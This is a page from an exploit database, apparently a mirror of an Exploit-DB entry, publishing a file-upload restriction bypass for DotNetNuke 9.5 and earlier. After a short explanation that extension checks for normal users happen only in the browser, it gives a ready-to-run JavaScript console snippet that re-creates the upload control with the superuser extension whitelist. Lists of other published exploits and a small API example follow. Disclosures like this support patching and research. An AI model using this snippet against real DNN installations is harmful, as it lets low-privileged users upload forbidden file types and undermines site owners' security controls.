Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"DotNetNuke 9.5 - File Upload Restrictions Bypass"

Author

Exploit author

"Sajjad Pourali"

Platform

Exploit platform

aspx

Release date

Exploit published date

2020-02-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass
# Date: 2020-02-23
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : N/A
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175

The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats  jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv.

As a normal user you are allowed to upload files with bmp,gif,ico,jpeg,jpg,jpe,png,svg extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.

Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.

For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browsers console (in the tab that manages profiles page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.

dnn.createFileUpload({
    "clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
    "moduleId": "",
    "parentClientId": null,
    "showOnStartup": true,
    "folderPicker": {
        "selectedItemCss": "selected-item",
        "internalStateFieldId": null,
        "disabled": false,
        "selectItemDefaultText": "",
        "initialState": {
            "selectedItem": {
                "key": "0",
                "value": "My Folder"
            }
        },
        "onSelectionChanged": []
    },
    "maxFileSize": 299892736,
    "maxFiles": 0,
    "extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
    "resources": {
        "title": "Upload Files",
        "decompressLabel": "Decompress Zip Files",
        "uploadToFolderLabel": "Upload To:",
        "dragAndDropAreaTitle": "Drag files here or click to browse",
        "uploadFileMethod": "Upload File",
        "uploadFromWebMethod": "From URL",
        "closeButtonText": "Close",
        "uploadFromWebButtonText": "Upload",
        "decompressingFile": "Decompressing File",
        "fileIsTooLarge": "File size bigger than 286. Mb",
        "fileUploadCancelled": "Upload cancelled",
        "fileUploadFailed": "Upload failed",
        "fileUploaded": "File uploaded",
        "emptyFileUpload": "Your browser does not support empty file uploads.",
        "fileAlreadyExists": "The file you want to upload already exists in this folder.",
        "uploadStopped": "File upload stopped",
        "urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
        "keepButtonText": "Keep",
        "replaceButtonText": "Replace",
        "tooManyFiles": "You cannot upload more than {0} file(s) at once.",
        "invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload.  You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
        "unzipFilePromptTitle": "Unzip Information",
        "unzipFileFailedPromptBody": "<div class=\"invalidFiles\"><p>[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:</p>[FILELIST]</div>",
        "unzipFileSuccessPromptBody": "<div class=\"validFiles\"><p>[TOTAL] of [TOTAL] file(s) were extracted successfully.</p></div>",
        "errorDialogTitle": "Error"
    },
    "width": 780,
    "height": 630,
    "folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder,
    "parameters": {}
});
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-11-06 "BlogEngine 3.3.8 - 'Content' Stored XSS" webapps aspx "Andrey Stoykov"
2020-08-17 "Microsoft SharePoint Server 2019 - Remote Code Execution" webapps aspx "West Shepherd"
2020-05-12 "Orchard Core RC1 - Persistent Cross-Site Scripting" webapps aspx SunCSR
2020-05-11 "Kartris 1.6 - Arbitrary File Upload" webapps aspx "Nhat Ha"
2020-02-24 "DotNetNuke 9.5 - Persistent Cross-Site Scripting" webapps aspx "Sajjad Pourali"
2020-02-24 "DotNetNuke 9.5 - File Upload Restrictions Bypass" webapps aspx "Sajjad Pourali"
2019-12-18 "Telerik UI - Remote Code Execution via Insecure Deserialization" webapps aspx "Bishop Fox"
2019-12-17 "NopCommerce 4.2.0 - Privilege Escalation" webapps aspx "Alessandro Magnosi"
2019-12-16 "Roxy Fileman 1.4.5 - Directory Traversal" webapps aspx "Patrik Lantz"
2019-11-12 "Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting" webapps aspx Cy83rl0gger
Release Date Title Type Platform Author
2020-02-24 "DotNetNuke 9.5 - Persistent Cross-Site Scripting" webapps aspx "Sajjad Pourali"
2020-02-24 "DotNetNuke 9.5 - File Upload Restrictions Bypass" webapps aspx "Sajjad Pourali"
2013-08-15 "DotNetNuke DNNArticle Module 10.0 - SQL Injection" webapps php "Sajjad Pourali"
2013-08-13 "DotNetNuke 6.1.x - Cross-Site Scripting" webapps asp "Sajjad Pourali"
2013-01-07 "Ettercap 0.7.5.1 - Stack Overflow" dos unix "Sajjad Pourali"
2012-01-13 "MailEnable Webmail - Cross-Site Scripting" webapps asp "Sajjad Pourali"
2012-01-12 "MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting" webapps asp "Sajjad Pourali"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48125/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.